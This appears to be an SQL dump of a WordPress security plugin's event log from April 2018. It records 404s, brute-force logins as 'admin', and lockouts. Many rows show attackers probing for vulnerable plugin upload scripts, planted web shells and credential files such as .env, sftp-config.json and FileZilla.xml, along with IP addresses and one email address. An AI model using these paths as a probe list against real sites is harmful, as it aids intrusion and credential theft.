(85323, 'four_oh_four', '404 Error', 3, '2018-04-22 13:45:09', '2018-04-22 18:45:09', '187.18.222.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85322, 'four_oh_four', '404 Error', 3, '2018-04-22 13:37:51', '2018-04-22 18:37:51', '193.106.30.99', '', 0, '/wp-content/themes/peekaboo/404.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85321, 'four_oh_four', '404 Error', 3, '2018-04-22 13:30:00', '2018-04-22 18:30:00', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85319, 'four_oh_four', '404 Error', 3, '2018-04-22 13:10:55', '2018-04-22 18:10:55', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85320, 'four_oh_four', '404 Error', 3, '2018-04-22 13:20:55', '2018-04-22 18:20:55', '216.244.66.234', '', 0, '/author/maria/page/64/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85318, 'four_oh_four', '404 Error', 3, '2018-04-22 13:04:29', '2018-04-22 18:04:29', '178.221.118.189', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85317, 'four_oh_four', '404 Error', 3, '2018-04-22 12:41:37', '2018-04-22 17:41:37', '92.53.165.210', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85316, 'four_oh_four', '404 Error', 3, '2018-04-22 12:26:44', '2018-04-22 17:26:44', '65.19.167.131', '', 0, '/global-belief-relief/XcpUS/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85315, 'four_oh_four', '404 Error', 3, '2018-04-22 12:24:29', '2018-04-22 17:24:29', '157.55.39.11', '', 0, '/who-we-are/4154626692/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85314, 'four_oh_four', '404 Error', 3, '2018-04-22 12:13:46', '2018-04-22 17:13:46', '93.99.6.158', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85312, 'four_oh_four', '404 Error', 3, '2018-04-22 12:09:51', '2018-04-22 17:09:51', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85313, 'four_oh_four', '404 Error', 3, '2018-04-22 12:13:44', '2018-04-22 17:13:44', '93.99.6.158', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85311, 'four_oh_four', '404 Error', 3, '2018-04-22 12:04:40', '2018-04-22 17:04:40', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85310, 'four_oh_four', '404 Error', 3, '2018-04-22 11:49:04', '2018-04-22 16:49:04', '216.244.66.247', '', 0, '/blog/page/72/marcopoloslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85309, 'four_oh_four', '404 Error', 3, '2018-04-22 11:42:24', '2018-04-22 16:42:24', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85307, 'four_oh_four', '404 Error', 3, '2018-04-22 11:42:20', '2018-04-22 16:42:20', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85308, 'four_oh_four', '404 Error', 3, '2018-04-22 11:42:23', '2018-04-22 16:42:23', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85306, 'four_oh_four', '404 Error', 3, '2018-04-22 11:42:19', '2018-04-22 16:42:19', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85305, 'four_oh_four', '404 Error', 3, '2018-04-22 11:37:28', '2018-04-22 16:37:28', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85303, 'four_oh_four', '404 Error', 3, '2018-04-22 11:12:38', '2018-04-22 16:12:38', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85304, 'four_oh_four', '404 Error', 3, '2018-04-22 11:30:31', '2018-04-22 16:30:31', '45.117.28.207', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85302, 'four_oh_four', '404 Error', 3, '2018-04-22 11:11:08', '2018-04-22 16:11:08', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85301, 'lockout', 'Host or User Lockout', 10, '2018-04-22 10:59:54', '2018-04-22 15:59:54', '145.239.91.37', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-22 11:14:54";s:11:"expires_gmt";s:19:"2018-04-22 16:14:54";s:4:"type";s:11:"brute_force";}'),
(85300, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 10:59:54', '2018-04-22 15:59:54', '145.239.91.37', 'admin', 0, '', '', 'a:0:{}'),
(85299, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 10:59:54', '2018-04-22 15:59:54', '145.239.91.37', 'admin', 0, '', '', 'a:0:{}'),
(85298, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 10:59:54', '2018-04-22 15:59:54', '145.239.91.37', 'admin', 0, '', '', 'a:0:{}'),
(85297, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 10:59:54', '2018-04-22 15:59:54', '145.239.91.37', 'admin', 0, '', '', 'a:0:{}'),
(85296, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 10:59:54', '2018-04-22 15:59:54', '145.239.91.37', 'admin', 0, '', '', 'a:0:{}'),
(85295, 'four_oh_four', '404 Error', 3, '2018-04-22 10:49:31', '2018-04-22 15:49:31', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85294, 'four_oh_four', '404 Error', 3, '2018-04-22 10:48:11', '2018-04-22 15:48:11', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85293, 'four_oh_four', '404 Error', 3, '2018-04-22 10:48:03', '2018-04-22 15:48:03', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85291, 'four_oh_four', '404 Error', 3, '2018-04-22 10:41:44', '2018-04-22 15:41:44', '178.220.229.36', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85292, 'four_oh_four', '404 Error', 3, '2018-04-22 10:44:36', '2018-04-22 15:44:36', '27.34.20.123', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85290, 'four_oh_four', '404 Error', 3, '2018-04-22 10:35:57', '2018-04-22 15:35:57', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85289, 'four_oh_four', '404 Error', 3, '2018-04-22 10:31:06', '2018-04-22 15:31:06', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85288, 'four_oh_four', '404 Error', 3, '2018-04-22 10:23:46', '2018-04-22 15:23:46', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85287, 'four_oh_four', '404 Error', 3, '2018-04-22 10:06:17', '2018-04-22 15:06:17', '193.106.30.99', '', 0, '/wp-content/themes/porto/framework/spyropress-context.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85286, 'four_oh_four', '404 Error', 3, '2018-04-22 09:54:47', '2018-04-22 14:54:47', '112.206.131.161', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85285, 'four_oh_four', '404 Error', 3, '2018-04-22 09:51:49', '2018-04-22 14:51:49', '207.46.13.161', '', 0, '/certified-coaches/www.yoursedonacoach.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85284, 'four_oh_four', '404 Error', 3, '2018-04-22 09:44:57', '2018-04-22 14:44:57', '95.24.232.98', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/good-news-and-bad/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85283, 'four_oh_four', '404 Error', 3, '2018-04-22 09:44:57', '2018-04-22 14:44:57', '95.24.232.98', '', 0, '/wp-content/plugins/ready-ecommerce/templates/img/ok-icon.png', 'http://clearyourbeliefs.com/good-news-and-bad/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85282, 'four_oh_four', '404 Error', 3, '2018-04-22 09:38:14', '2018-04-22 14:38:14', '100.43.85.173', '', 0, '/blog/page/73/marcopoloslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85281, 'four_oh_four', '404 Error', 3, '2018-04-22 09:31:35', '2018-04-22 14:31:35', '219.131.84.79', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85280, 'four_oh_four', '404 Error', 3, '2018-04-22 09:31:33', '2018-04-22 14:31:33', '219.131.84.79', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85279, 'four_oh_four', '404 Error', 3, '2018-04-22 09:25:42', '2018-04-22 14:25:42', '178.137.88.27', '', 0, '/wp-content/plugins/wp-symposium/server/php/AGacGeNnMFQnKK.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85278, 'four_oh_four', '404 Error', 3, '2018-04-22 09:25:37', '2018-04-22 14:25:37', '178.137.88.27', '', 0, '/wp-content/plugins/formcraft/file-upload/server/php/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85277, 'four_oh_four', '404 Error', 3, '2018-04-22 09:25:35', '2018-04-22 14:25:35', '178.137.88.27', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85276, 'four_oh_four', '404 Error', 3, '2018-04-22 09:25:34', '2018-04-22 14:25:34', '178.137.88.27', '', 0, '/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85275, 'four_oh_four', '404 Error', 3, '2018-04-22 09:10:37', '2018-04-22 14:10:37', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85274, 'four_oh_four', '404 Error', 3, '2018-04-22 09:07:39', '2018-04-22 14:07:39', '152.168.194.138', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85273, 'four_oh_four', '404 Error', 3, '2018-04-22 08:50:57', '2018-04-22 13:50:57', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85271, 'four_oh_four', '404 Error', 3, '2018-04-22 08:15:58', '2018-04-22 13:15:58', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85272, 'four_oh_four', '404 Error', 3, '2018-04-22 08:21:02', '2018-04-22 13:21:02', '41.107.178.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85270, 'four_oh_four', '404 Error', 3, '2018-04-22 08:10:39', '2018-04-22 13:10:39', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85269, 'four_oh_four', '404 Error', 3, '2018-04-22 08:00:38', '2018-04-22 13:00:38', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85267, 'four_oh_four', '404 Error', 3, '2018-04-22 07:25:22', '2018-04-22 12:25:22', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85268, 'four_oh_four', '404 Error', 3, '2018-04-22 07:26:08', '2018-04-22 12:26:08', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85266, 'four_oh_four', '404 Error', 3, '2018-04-22 07:24:59', '2018-04-22 12:24:59', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85265, 'four_oh_four', '404 Error', 3, '2018-04-22 07:20:33', '2018-04-22 12:20:33', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85263, 'four_oh_four', '404 Error', 3, '2018-04-22 07:03:21', '2018-04-22 12:03:21', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85264, 'four_oh_four', '404 Error', 3, '2018-04-22 07:17:44', '2018-04-22 12:17:44', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85262, 'four_oh_four', '404 Error', 3, '2018-04-22 06:52:04', '2018-04-22 11:52:04', '193.106.30.99', '', 0, '/wp-includes/pomo/hdweb.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85261, 'four_oh_four', '404 Error', 3, '2018-04-22 06:46:44', '2018-04-22 11:46:44', '91.200.12.140', '', 0, '/fckeditor/editor/filemanager/connectors/php/upload.php', '', 'a:1:{s:12:"query_string";s:10:"Type=Media";}'),
(85260, 'four_oh_four', '404 Error', 3, '2018-04-22 06:46:39', '2018-04-22 11:46:39', '91.200.12.140', '', 0, '/wp-content/plugins/downloads-manager/img/unlock.gif', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85259, 'four_oh_four', '404 Error', 3, '2018-04-22 06:46:35', '2018-04-22 11:46:35', '91.200.12.140', '', 0, '/wp-content/plugins/category-page-icons/css/menu.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85258, 'four_oh_four', '404 Error', 3, '2018-04-22 06:46:06', '2018-04-22 11:46:06', '91.200.12.140', '', 0, '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85257, 'four_oh_four', '404 Error', 3, '2018-04-22 06:45:48', '2018-04-22 11:45:48', '91.200.12.140', '', 0, '/jm-ajax/upload_file/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85256, 'four_oh_four', '404 Error', 3, '2018-04-22 06:45:37', '2018-04-22 11:45:37', '91.200.12.140', '', 0, '/wp-content/plugins/wp-mobile-detector/resize.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85255, 'four_oh_four', '404 Error', 3, '2018-04-22 06:45:33', '2018-04-22 11:45:33', '91.200.12.140', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85254, 'four_oh_four', '404 Error', 3, '2018-04-22 06:45:26', '2018-04-22 11:45:26', '91.200.12.140', '', 0, '/wp-content/plugins/formcraft/file-upload/server/content/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85253, 'four_oh_four', '404 Error', 3, '2018-04-22 06:45:20', '2018-04-22 11:45:20', '91.200.12.140', '', 0, '/wp-content/plugins/formcraft/file-upload/server/content/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85252, 'four_oh_four', '404 Error', 3, '2018-04-22 06:45:14', '2018-04-22 11:45:14', '91.200.12.140', '', 0, '/wp-content/plugins/cherry-plugin/admin/import-export/settings_auto.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85251, 'four_oh_four', '404 Error', 3, '2018-04-22 06:44:25', '2018-04-22 11:44:25', '91.200.12.140', '', 0, '/wp-content/plugins/hd-webplayer/playlist.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85250, 'four_oh_four', '404 Error', 3, '2018-04-22 06:43:42', '2018-04-22 11:43:42', '91.200.12.140', '', 0, '/templates/system/css/system.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85249, 'four_oh_four', '404 Error', 3, '2018-04-22 06:43:33', '2018-04-22 11:43:33', '91.200.12.140', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85248, 'four_oh_four', '404 Error', 3, '2018-04-22 06:43:26', '2018-04-22 11:43:26', '91.200.12.140', '', 0, '/admin/images/cal_date_over.gif', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85247, 'four_oh_four', '404 Error', 3, '2018-04-22 06:39:49', '2018-04-22 11:39:49', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85246, 'four_oh_four', '404 Error', 3, '2018-04-22 06:37:15', '2018-04-22 11:37:15', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85245, 'four_oh_four', '404 Error', 3, '2018-04-22 06:33:54', '2018-04-22 11:33:54', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85244, 'lockout', 'Host or User Lockout', 10, '2018-04-22 06:25:58', '2018-04-22 11:25:58', '54.37.74.56', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-22 06:40:58";s:11:"expires_gmt";s:19:"2018-04-22 11:40:58";s:4:"type";s:11:"brute_force";}'),
(85243, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 06:25:58', '2018-04-22 11:25:58', '54.37.74.56', 'admin', 0, '', '', 'a:0:{}'),
(85240, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 06:25:58', '2018-04-22 11:25:58', '54.37.74.56', 'admin', 0, '', '', 'a:0:{}'),
(85241, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 06:25:58', '2018-04-22 11:25:58', '54.37.74.56', 'admin', 0, '', '', 'a:0:{}'),
(85242, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 06:25:58', '2018-04-22 11:25:58', '54.37.74.56', 'admin', 0, '', '', 'a:0:{}'),
(85239, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 06:25:58', '2018-04-22 11:25:58', '54.37.74.56', 'admin', 0, '', '', 'a:0:{}'),
(85238, 'four_oh_four', '404 Error', 3, '2018-04-22 06:20:30', '2018-04-22 11:20:30', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85237, 'four_oh_four', '404 Error', 3, '2018-04-22 05:57:14', '2018-04-22 10:57:14', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85235, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 05:56:49', '2018-04-22 10:56:49', '89.144.12.17', 'admin', 0, '', '', 'a:0:{}'),
(85236, 'lockout', 'Host or User Lockout', 10, '2018-04-22 05:56:49', '2018-04-22 10:56:49', '89.144.12.17', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-22 06:11:49";s:11:"expires_gmt";s:19:"2018-04-22 11:11:49";s:4:"type";s:11:"brute_force";}'),
(85233, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 05:56:49', '2018-04-22 10:56:49', '89.144.12.17', 'admin', 0, '', '', 'a:0:{}'),
(85234, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 05:56:49', '2018-04-22 10:56:49', '89.144.12.17', 'admin', 0, '', '', 'a:0:{}'),
(85232, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 05:56:49', '2018-04-22 10:56:49', '89.144.12.17', 'admin', 0, '', '', 'a:0:{}'),
(85231, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-22 05:56:49', '2018-04-22 10:56:49', '89.144.12.17', 'admin', 0, '', '', 'a:0:{}'),
(85230, 'four_oh_four', '404 Error', 3, '2018-04-22 05:40:12', '2018-04-22 10:40:12', '107.175.32.47', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85229, 'four_oh_four', '404 Error', 3, '2018-04-22 05:40:10', '2018-04-22 10:40:10', '107.175.32.47', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85228, 'four_oh_four', '404 Error', 3, '2018-04-22 05:21:47', '2018-04-22 10:21:47', '188.138.105.23', '', 0, '/global-belief-relief/wp-content/plugins/cacheformwp.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85227, 'four_oh_four', '404 Error', 3, '2018-04-22 05:17:10', '2018-04-22 10:17:10', '188.138.105.23', '', 0, '/wp-content/plugins/cacheformwp.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85226, 'four_oh_four', '404 Error', 3, '2018-04-22 05:13:07', '2018-04-22 10:13:07', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85225, 'four_oh_four', '404 Error', 3, '2018-04-22 05:06:04', '2018-04-22 10:06:04', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85224, 'four_oh_four', '404 Error', 3, '2018-04-22 05:06:03', '2018-04-22 10:06:03', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85223, 'four_oh_four', '404 Error', 3, '2018-04-22 05:06:03', '2018-04-22 10:06:03', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85222, 'four_oh_four', '404 Error', 3, '2018-04-22 05:06:02', '2018-04-22 10:06:02', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85221, 'four_oh_four', '404 Error', 3, '2018-04-22 05:06:00', '2018-04-22 10:06:00', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85220, 'four_oh_four', '404 Error', 3, '2018-04-22 05:06:00', '2018-04-22 10:06:00', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85219, 'four_oh_four', '404 Error', 3, '2018-04-22 05:06:00', '2018-04-22 10:06:00', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85218, 'four_oh_four', '404 Error', 3, '2018-04-22 05:05:59', '2018-04-22 10:05:59', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85217, 'four_oh_four', '404 Error', 3, '2018-04-22 04:57:54', '2018-04-22 09:57:54', '49.145.146.141', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85216, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:25', '2018-04-22 08:39:25', '195.22.127.231', '', 0, '/WinSCP.ini', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85215, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:24', '2018-04-22 08:39:24', '195.22.127.231', '', 0, '/winscp.ini', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85214, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:23', '2018-04-22 08:39:23', '195.22.127.231', '', 0, '/FileZilla.xml', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85213, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:22', '2018-04-22 08:39:22', '195.22.127.231', '', 0, '/sitemanager.xml', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85212, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:21', '2018-04-22 08:39:21', '195.22.127.231', '', 0, '/filezilla.xml', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85211, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:20', '2018-04-22 08:39:20', '195.22.127.231', '', 0, '/WS_FTP.INI', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85209, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:18', '2018-04-22 08:39:18', '195.22.127.231', '', 0, '/WS_FTP.ini', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85210, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:19', '2018-04-22 08:39:19', '195.22.127.231', '', 0, '/ws_ftp.ini', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85207, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:16', '2018-04-22 08:39:16', '195.22.127.231', '', 0, '/.vscode/ftp-sync.json', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85208, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:17', '2018-04-22 08:39:17', '195.22.127.231', '', 0, '/deployment-config.json', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85206, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:15', '2018-04-22 08:39:15', '195.22.127.231', '', 0, '/.remote-sync.json', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85205, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:14', '2018-04-22 08:39:14', '195.22.127.231', '', 0, '/.ftpconfig', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85203, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:12', '2018-04-22 08:39:12', '195.22.127.231', '', 0, '/.env', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85204, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:13', '2018-04-22 08:39:13', '195.22.127.231', '', 0, '/sftp-config.json', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85202, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:11', '2018-04-22 08:39:11', '195.22.127.231', '', 0, '/app/etc/local.xml', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85201, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:10', '2018-04-22 08:39:10', '195.22.127.231', '', 0, '/lfm.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85200, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:09', '2018-04-22 08:39:09', '195.22.127.231', '', 0, '/config/database.yml', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85199, 'four_oh_four', '404 Error', 3, '2018-04-22 03:39:08', '2018-04-22 08:39:08', '195.22.127.231', '', 0, '/config/databases.yml', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85197, 'four_oh_four', '404 Error', 3, '2018-04-22 02:34:50', '2018-04-22 07:34:50', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85198, 'four_oh_four', '404 Error', 3, '2018-04-22 03:14:11', '2018-04-22 08:14:11', '178.45.17.120', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85196, 'four_oh_four', '404 Error', 3, '2018-04-22 01:55:30', '2018-04-22 06:55:30', '103.60.175.65', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85195, 'four_oh_four', '404 Error', 3, '2018-04-22 01:41:18', '2018-04-22 06:41:18', '193.106.30.99', '', 0, '/wp-log-7.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85194, 'four_oh_four', '404 Error', 3, '2018-04-22 01:31:53', '2018-04-22 06:31:53', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85193, 'four_oh_four', '404 Error', 3, '2018-04-22 01:08:01', '2018-04-22 06:08:01', '192.227.205.229', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85192, 'four_oh_four', '404 Error', 3, '2018-04-22 01:07:59', '2018-04-22 06:07:59', '192.227.205.229', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85191, 'four_oh_four', '404 Error', 3, '2018-04-22 01:01:34', '2018-04-22 06:01:34', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85190, 'four_oh_four', '404 Error', 3, '2018-04-22 00:58:22', '2018-04-22 05:58:22', '193.106.30.99', '', 0, '/global-belief-relief/wp-log-7.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85189, 'four_oh_four', '404 Error', 3, '2018-04-22 00:32:55', '2018-04-22 05:32:55', '36.255.85.69', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85188, 'four_oh_four', '404 Error', 3, '2018-04-22 00:20:04', '2018-04-22 05:20:04', '216.244.66.234', '', 0, '/author/maria/page/45/slotyru.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85187, 'four_oh_four', '404 Error', 3, '2018-04-22 00:06:58', '2018-04-22 05:06:58', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85186, 'four_oh_four', '404 Error', 3, '2018-04-21 23:58:21', '2018-04-22 04:58:21', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85185, 'four_oh_four', '404 Error', 3, '2018-04-21 23:30:33', '2018-04-22 04:30:33', '193.106.30.99', '', 0, '/wp-includes/pomo/so.php', '', 'a:1:{s:12:"query_string";s:3:"x=1";}'),
(85184, 'four_oh_four', '404 Error', 3, '2018-04-21 23:28:12', '2018-04-22 04:28:12', '66.249.69.102', '', 0, '/author/maria/page/4/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85183, 'four_oh_four', '404 Error', 3, '2018-04-21 23:04:07', '2018-04-22 04:04:07', '216.244.66.234', '', 0, '/blog/page/72/aztek-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
